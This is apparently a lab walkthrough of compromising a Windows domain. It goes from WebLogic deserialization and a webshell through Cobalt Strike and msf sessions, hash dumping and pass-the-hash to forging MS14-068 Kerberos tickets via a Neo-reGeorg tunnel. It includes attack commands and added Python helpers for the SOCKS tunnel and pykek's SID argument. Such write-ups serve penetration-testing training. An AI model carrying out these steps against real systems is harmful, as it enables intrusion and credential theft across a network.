I. Environment setup:
1. Lab information, compiled from what the author published:
Unified login password for the whole lab: 1qaz@WSX
2. Network configuration:
① Win2008 with two NICs, simulating the external and internal networks:
External: 192.168.1.80, bridged mode, reachable from the physical host
Internal: 10.10.10.80, host-only mode
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163434553-1916761121.png)
② PC-win7, internal network only:
Internal: 10.10.10.201, host-only mode
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163437521-116973672.png)
③ win2012-DC, internal network only:
Internal: 10.10.10.10, host-only mode
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163439586-1688265759.png)
Starting the web service:
Run the .bat file under C:\Oracle\Middleware\user_projects\domains\base_domain (note: right-click it and run as administrator):
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163501636-1036609675.png)
Then browse to port 7001 with /console and let it deploy automatically; once that finishes the environment is up
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163623839-1721446440.png)
Result after startup:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163647050-1514417620.png)
II. Web-layer penetration:
1. Information gathering:
① Use nmap to scan the web server's ports and exposed services
nmap -sS -T4 192.168.1.80
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163725257-1965875695.png)
Attack plan based on the port information:
445 and 3389 are candidates for MS17-010 or CVE-2019-0708 (BlueKeep); 7001 is WebLogic, where a deserialization vulnerability gives a shell
2. Getshell:
① WebLogic deserialization getshell
Since WebLogic is listening on 7001, run the exploit tool against it directly; it reports the CVE-2019-2725 deserialization vulnerability (the wls9_async_response component, which is why the shell lands under /_async/)
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163754208-1294812300.png)
Execute a command:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163801146-422323405.png)
Upload a Behinder (冰蝎) webshell directly:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163805961-1917124131.png)
Connect with Behinder using the returned webshell URL:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163814983-1200062848.png)
III. Internal network penetration:
1. Spawning CS and msf sessions:
① Use Behinder to reverse a shell to msf
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163833913-236083932.png)
Set up the listener and the session comes in:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163841125-931915662.png)
② Getting a CS beacon:
First tried spawning from msf to CS, but that failed, so instead generated a payload with CS, uploaded it to the target and executed it
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163851200-836015998.png)
Beacon checked in:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163906128-916970946.png)
③ Escalating the beacon
Escalate directly with MS15-051 (win32k kernel privilege escalation)
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163917597-87463087.png)
On success a new beacon running as SYSTEM is returned
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163928073-671835803.png)
2. Internal network reconnaissance:
① Check the network adapter information
The host belongs to the domain de1ay.com and its DNS server is 10.10.10.10 (in a domain the DNS server is usually the domain controller)
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163943089-1671434220.png)
② Gather domain information
Users:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163954043-401121705.png)
Machines in the domain:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163959130-304796384.png)
Domain admins:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164005709-430574908.png)
Domain controllers:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164010298-1506525241.png)
③ Dump hashes
On the web server, captured the plaintext passwords and hashes of two accounts, both with fairly high privileges…
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164016006-1984872081.png)
3. Lateral movement:
① Trying system vulnerabilities
First add a route for the 10.10.10.0/24 segment through the msf session
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164035271-1712228664.png)
Then tried MS17-010: the check reports the target as vulnerable, but the exploit never returns a shell; CVE-2019-0708 has the same problem, so this approach was abandoned
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164040617-1837631075.png)
② Pass the hash --> PC
Use CS's SMB beacon (very convenient) for the PTH attack: pick a credential, choose the SMB listener, and launch the attack from a beacon that can reach the target host. The SMB beacon is linked back to that parent beacon over a named pipe, so the parent must have SMB (445) access to the target
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164046971-1904354615.png)
The attack completes and we get a beacon on the PC host 10.10.10.201:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164057800-1098401139.png)
Dump hashes again, which also yields the plaintext password and hash of the mssql user:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164102369-1749695401.png)
③ Pass the hash --> DC
Use the same method to PTH to the domain controller
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164110787-1503168572.png)
The DC beacon checks in:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164120699-274254255.png)
Then dump all the hashes in the domain:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164124920-1066175630.png)
4. An alternative escalation route: MS14-068
① Set up a SOCKS5 proxy with Neo-reGeorg
Upload the tunnel script into the same directory as the webshell
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164139399-1605634062.png)
python neoreg.py -k cmd -u http://192.168.1.80:7001/_async/tunnel.jsp -p 1080
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164144956-1215489885.png)
Then point the proxy tool (proxychains here) at 127.0.0.1:1080
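What proxychains sends to that listener on 127.0.0.1:1080 is a plain SOCKS5 (RFC 1928) handshake followed by a CONNECT request; neoreg answers it locally and carries the bytes after the reply back and forth inside HTTP requests to tunnel.jsp. The Python below is an added example, not part of Neo-reGeorg or proxychains; it builds the client messages and parses the server replies so the exchange runs offline. The proxy replies are constructed here, and the example assumes the no-authentication method.

```python
"""Added example: the SOCKS5 exchange between proxychains and the neoreg
listener, reduced to message building and parsing (RFC 1928)."""
import ipaddress
import struct

SOCKS_VERSION = 5
NO_AUTH = 0x00
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REPLY_TEXT = {0: "succeeded", 1: "general SOCKS server failure",
              2: "connection not allowed by ruleset", 3: "network unreachable",
              4: "host unreachable", 5: "connection refused", 6: "TTL expired",
              7: "command not supported", 8: "address type not supported"}


def greeting(methods=(NO_AUTH,)) -> bytes:
    """Client hello: VER | NMETHODS | METHODS."""
    return bytes([SOCKS_VERSION, len(methods), *methods])


def parse_method_select(reply: bytes) -> int:
    """Server answer to the hello: VER | METHOD (0xFF = nothing acceptable)."""
    ver, method = reply[0], reply[1]
    if ver != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 server")
    if method == 0xFF:
        raise ValueError("no acceptable authentication method")
    return method


def connect_request(host: str, port: int) -> bytes:
    """VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT.

    IP literals go as ATYP 1/4; anything else is sent as a domain name so the
    proxy (i.e. the web server side of the tunnel) resolves it, which is what
    proxychains-ng does when proxy_dns is enabled.
    """
    try:
        ip = ipaddress.ip_address(host)
        atyp, addr = (ATYP_IPV4 if ip.version == 4 else ATYP_IPV6), ip.packed
    except ValueError:
        name = host.encode("idna")
        if len(name) > 255:
            raise ValueError("hostname too long for SOCKS5")
        atyp, addr = ATYP_DOMAIN, bytes([len(name)]) + name
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00, atyp]) + addr + struct.pack(">H", port)


def parse_reply(reply: bytes):
    """Parse VER | REP | RSV | ATYP | BND.ADDR | BND.PORT into (rep, addr, port)."""
    ver, rep, _rsv, atyp = reply[0], reply[1], reply[2], reply[3]
    if ver != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 reply")
    if atyp == ATYP_IPV4:
        addr, rest = str(ipaddress.IPv4Address(reply[4:8])), reply[8:]
    elif atyp == ATYP_IPV6:
        addr, rest = str(ipaddress.IPv6Address(reply[4:20])), reply[20:]
    elif atyp == ATYP_DOMAIN:
        n = reply[4]
        addr, rest = reply[5:5 + n].decode(), reply[5 + n:]
    else:
        raise ValueError("unknown address type in reply")
    (port,) = struct.unpack(">H", rest[:2])
    return rep, addr, port


def socks5_connect_exchange(host: str, port: int, server_replies):
    """Drive the client side of one CONNECT.

    `server_replies` is the list of byte strings the proxy would send back
    (constructed by the caller here; a real client reads them from the socket).
    Returns (messages_sent, (rep, bound_addr, bound_port)).
    """
    sent = [greeting()]
    if parse_method_select(server_replies[0]) != NO_AUTH:
        raise ValueError("only the no-auth method is implemented in this example")
    sent.append(connect_request(host, port))
    return sent, parse_reply(server_replies[1])


if __name__ == "__main__":
    # Constructed replies: proxy accepts no-auth, then reports the connect succeeded
    ok = [b"\x05\x00", b"\x05\x00\x00\x01\x00\x00\x00\x00\x00\x00"]
    sent, (rep, addr, bport) = socks5_connect_exchange("10.10.10.10", 445, ok)
    print([m.hex() for m in sent], REPLY_TEXT[rep])
```

A REP code other than 0 in the second reply (for instance 5, connection refused) is the proxy side telling you that the web server could not reach the internal host and port; that distinguishes "the tunnel is broken" from "the target port is closed" when a proxied nmap or pykek run just hangs.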
② Get the domain user's SID
Via process injection, bring back a lower-privileged beacon running as the mssql domain user:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164212364-386209236.png)
Then run a command in that beacon (for example whoami /user) to get the domain user's SID:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164218225-237419481.png)
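pykek's ms14-068.py takes the user SID as text, and it is easy to paste the wrong thing (the domain SID without the RID, or a group SID). The Python below is an added example, not the author's code or part of pykek: it pulls the SID out of constructed `whoami /user` output, splits it into domain SID and RID, builds the argument list for the command shown in the next step, and shows the binary SID layout that ends up inside the PAC the exploit forges. The sample SID and account are invented.

```python
"""Added example: extracting and checking the SID that ms14-068.py needs."""
import re
import struct

# Constructed sample of `whoami /user` output on a domain-joined host;
# the SID value is made up for this example.
SAMPLE_WHOAMI_USER = """
USER INFORMATION
----------------

User Name   SID
=========== =============================================
de1ay\\mssql S-1-5-21-2756371121-2868759905-3853650604-2103
"""

SID_RE = re.compile(r"\bS-1-\d+(?:-\d+)+\b")
DOMAIN_PREFIX = "S-1-5-21-"  # NT authority, "domain/local account" sub-authority


def sid_from_whoami(output: str) -> str:
    """Return the first SID found in `whoami /user` output."""
    m = SID_RE.search(output)
    if not m:
        raise ValueError("no SID in whoami /user output")
    return m.group(0)


def split_sid(sid: str):
    """Split an account SID into (domain SID, RID); rejects well-known SIDs."""
    head, _, rid = sid.rpartition("-")
    if not sid.startswith(DOMAIN_PREFIX) or sid.count("-") != 7:
        raise ValueError("not a domain account SID: " + sid)
    return head, int(rid)


def sid_to_bytes(sid: str) -> bytes:
    """Binary SID: revision, sub-authority count, 48-bit big-endian authority,
    then each sub-authority as a 32-bit little-endian word (PAC/objectSid layout)."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1" or len(parts) < 3:
        raise ValueError("malformed SID: " + sid)
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15:
        raise ValueError("too many sub-authorities")
    return (bytes([1, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(raw: bytes) -> str:
    """Inverse of sid_to_bytes."""
    rev, count = raw[0], raw[1]
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack("<%dI" % count, raw[8:8 + 4 * count])
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs)


def pykek_args(user_upn: str, sid: str, password: str, dc_ip: str):
    """Argument list for pykek's ms14-068.py, as used on this page; the SID
    must be the user's own SID, so validate it first."""
    split_sid(sid)
    return ["ms14-068.py", "-u", user_upn, "-s", sid, "-p", password, "-d", dc_ip]


if __name__ == "__main__":
    sid = sid_from_whoami(SAMPLE_WHOAMI_USER)
    print(sid, split_sid(sid))
    print(sid_to_bytes(sid).hex())
    print(" ".join(pykek_args("mssql@de1ay.com", sid, "1qaz@WSX", "10.10.10.10")))
```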
③ Obtain a ticket with pykek (run through proxychains so it reaches the internal network)
proxychains python ms14-068.py -u mssql@de1ay.com -s <SID> -p <password> -d <DC IP>
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164237602-1789612487.png)
Convert the ticket format with KrbCredExport.py (ccache to kirbi, the KRB-CRED format that CS and mimikatz import):
python2 KrbCredExport.py TGT_mssql@de1ay.com.ccache mssql.ticket
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164255329-1076065972.png)
④ Inject the ticket with CS
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164306410-1752229271.png)
Once the ticket is injected, commands such as dir can be run against the DC. Address it by host name (\\<DC hostname>\c$) rather than by IP: Kerberos needs an SPN to match, and an IP target falls back to NTLM, so the forged ticket would never be used
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164314076-893841998.png)
IV. Summary:
① Information gathering found port 7001; the deserialization vulnerability gave a shell directly
② Behinder reversed a shell to msf; a route was added and the internal network scanned to attempt lateral movement
③ PTH combined with CS's SMB beacon for lateral movement
④ Neo-reGeorg to set up a SOCKS5 proxy
⑤ MS14-068 for privilege escalation inside the domain